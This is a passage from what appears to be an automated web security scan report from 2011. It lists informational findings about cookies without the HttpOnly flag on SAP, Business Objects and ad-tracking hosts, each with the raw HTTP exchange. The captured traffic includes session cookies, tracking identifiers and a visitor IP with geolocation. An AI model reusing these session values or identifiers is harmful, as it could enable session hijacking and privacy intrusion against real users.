Location: http://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

12.36. https://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=953043236838-236721785208&protV=20&lpjson=1&id=2404879032&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:27:11 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33211

lpConnLib.Process({"ResultSet": {"lpCallId":"953043236838-236721785208","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
12.37. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; s_sv_p1=1@26@s/7243/7019/7341/6423&e/15; mbox=check#true#1318631931|session#1318631777052-118529#1318633731|PC#1318631777052-118529.19#1319841471; mbox-staging=check#true#1318631939|session#1318631787015-280970#1318633739|PC#1318631787015-280970.19#1319841479

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 15 Oct 2011 17:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 483
Content-Type: application/javascript
Date: Sat, 15 Oct 2011 13:47:00 GMT
Connection: close
Set-Cookie: omniture_unique=fe0e6c91699884f68443ba47d4700abf; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=v
...[SNIP]...
12.38. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e99a41848264554&sscs_active=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://s7.addthis.com/static/r07/sh62.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: segment-pixel.invitemedia.com
Proxy-Connection: Keep-Alive
Cookie: segments_p1="eJzjYuY4y8nFzPFejYuT40G4wM3by76yAPknOYDEZykuFo6N61mA5JEXjAD+JAwQ"; exchange_uid="eyI0IjogWyJDQUVTRUU0N0p5cG5jS2FHVzQzQnVoNlVleTQiLCA3MzQ0MTJdfQ=="; uid=b670d1b3-6ae0-4f57-baa7-b088401da6c3; partnerUID="eyI3OSI6IFsiMjdhM2YxMzlkOGZlMmI2MzdmNDY4NDdlMDkyNTdjYWIiLCB0cnVlXX0="; uid=0fd02718-925d-426f-97b4-9ed3e53d1800

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 15 Oct 2011 15:28:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 15-Oct-2011 15:27:56 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlOTlhNDE4NDgyNjQ1NTQiLCB0cnVlXSwgIjc5IjogWyIyN2EzZjEzOWQ4ZmUyYjYzN2Y0Njg0N2UwOTI1N2NhYiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sun, 14-Oct-2012 15:28:16 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
12.39. http://ssl-hints.netflame.cc/service/hint/C2033968180  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/hint/C2033968180

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/hint/C2033968180?report=3/u/%7Dl%7Dhttp%3A//www.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443%7Dhttp%3A//www.sap.com/index.epx%7D%7DC2033968180%7D0%7DtBuy%20Crystal%20Reports%20%26%20BI%20Software%20Solutions%20%7B1%20SAP%20Online%20Store%7D%7D%7D%7DfcP%3DC%3D0%26T%3D1318689061488%26DTO%3D1318689060945%26U%3D2033968180%26V%3D1318689060945%7B0fcR%3Dhttp%253A//www.sap.com/index.epx%7B0fcC%3DX%3DC2033968180%26Y%3D1318689061488%26FV%3D10%26H%3D1318689060945%26fcTHR%3Dstore.businessobjects.com%7B3www.businessobjects.com%26Z%3D0%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D366303%7D%7D%7D0%7D%7Dfc_uid%3D2033968180%7D-2%7D1920x1200%7D16%7D1%7D%7D1%7D10&r=0.3956656812224537 HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
FcHSHash: 276006192
P3P: policyref="http://www.fireclick.com/w3c/p3p.xml",CP="NON DSP LAW NID DEVa PSAa PSDa OUR IND COM NAV STA"
Set-Cookie: fcP.648765de68b1d3c7="C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689060945"; Version=1; Domain=ssl-hints.netflame.cc; Max-Age=315360000; Expires=Tue, 12-Oct-2021 14:30:47 GMT; Path=/
Set-Cookie: fcR.648765de68b1d3c7="http%3A//www.sap.com/index.epx"; Version=1; Domain=ssl-hints.netflame.cc; Path=/
Set-Cookie: fcC.648765de68b1d3c7="X=C2033968180&Y=1318689061488&FV=10&H=1318689060945&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0"; Version=1; Domain=ssl-hints.netflame.cc; Path=/
X-Cnection: close
Content-Type: app/fireclick.x-hint.1
Date: Sat, 15 Oct 2011 14:30:47 GMT
Content-Length: 11

fcPreds="";
12.40. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690973100%3B%20pe%3DprodView%252Cevent18%7C1318690973104%3B%20c3%3Dno%2520value%7C1318690973106%3B%20s_nr%3D1318689173112-New%7C1321281173112%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292773114%3B%20s_visit%3D1%7C1318690973116%3B%20gpv_p47%3Dno%2520value%7C1318690973119%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BtabView%25252528%25252527Tab3%25252527%25252529%2525257D%252526oidt%25253D2%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.194:260-0#0"; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689193563; fcC=X=C2033968180&Y=1318689193707&FV=10&H=1318689193563&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689149047

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; expires=Sun, 14-Oct-2012 20:26:09 GMT; path=/
Cache-Control: max-age=0
Set-Cookie: VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; expires=Sun, 14-Oct-2012 20:26:09 GMT; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; expires=Sun, 14-Oct-2012 20:26:09 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=263711236244,0)
Date: Sat, 15 Oct 2011 14:36:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 85214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
12.41. http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500 HTTP/1.1
Host: store.businessobjects.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjects%2FContent%2FpbPage.sap_countryselector%2Fpgm.76865500%3Fresid%3D__RESID__%26rests%3D1318689304331&t=commerce&p=globalcommerce&p1=bobjects&p2=40461937226&p3=newsession
Content-Type: text/plain
Set-Cookie: bobjects.pgm=76865500; expires=Sat, 15-Oct-2011 17:23:04 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=259416154415,0)
Content-Length: 0
Date: Sat, 15 Oct 2011 14:35:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Connection: close

12.42. http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.77505400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjects/Content/pbPage.sap_countryselector/pgm.77505400

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/bobjects/Content/pbPage.sap_countryselector/pgm.77505400 HTTP/1.1
Host: store.businessobjects.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjects%2FContent%2FpbPage.sap_countryselector%2Fpgm.77505400%3Fresid%3D__RESID__%26rests%3D1318689304539&t=commerce&p=globalcommerce&p1=bobjects&p2=40461937226&p3=newsession
Content-Type: text/plain
Set-Cookie: bobjects.pgm=77505400; expires=Sat, 15-Oct-2011 17:23:04 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=220761448769,0)
Content-Length: 0
Date: Sat, 15 Oct 2011 14:35:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Connection: close

12.43. https://store.sap.com/sap/ap/ui/repository/store/StartPage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.sap.com
Path:   /sap/ap/ui/repository/store/StartPage.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sap/ap/ui/repository/store/StartPage.html HTTP/1.1
Host: store.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved temporarily
set-cookie: oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut=0y9OLNAHotJM%252FaLUgvzizJL8okr9YiCZqh9cklhUEpCYnqqXUZKbowAA; path=/
set-cookie: sap-usercontext=sap-client=002; path=/
content-type: text/html
content-length: 0
cache-control: no-cache, no-store
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
location: https://accounts.sap.com/saml2/idp/sso/accounts.sap.com?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut
connection: close

12.44. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//smepartnerfinder.sap.com/Media/Flash/AppShell.swf&p=http%3A//www.yash.com/india/yash-enterprise-services-solutions-for-india.php&i=16677 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.yash.com/india/yash-enterprise-services-solutions-for-india.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Sat, 15 Oct 2011 14:29:15 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eyash%2Ecom%2Findia%2Fyash%2Denterprise%2Dservices%2Dsolutions%2Dfor%2Dindia%2Ephp; expires=Sun, 16-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
12.45. http://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.cfm?fuseaction=email.Redirect&EID=CFE16675750B02 HTTP/1.1
Host: teched2011madrid.sapevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:21:49 GMT
Content-Length: 221


    <script language="JavaScript">
window.location="http://www.sapteched.com/sapphirenowsaptechedmadrid/";
</script>

&nbsp;
                </p>
               </td>
            </tr>
           </table>
           
           </
...[SNIP]...
12.46. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=559f7m7161&tz=5&ref=http%3A%2F%2Fwww.newsgator.com%2FDefault.aspx%3Ftabid%3D214&page=http%3A%2F%2Finfo.newsgator.com%2FTrial_SocialSites2010.html%3FLeadsource%3Dtrial&uuid=F4143347-478D-456F-9FDA-2CD5D97335AB&rnd=1601796576 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://info.newsgator.com/Trial_SocialSites2010.html?Leadsource=trial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Sat, 15 Oct 2011 15:26:12 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Sun, 14-Oct-2012 15:26:12 GMT; Path=/

GIF89a.............,...........D..;
12.47. http://www.sap.com/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /Tracking.epi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 214
Origin: http://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 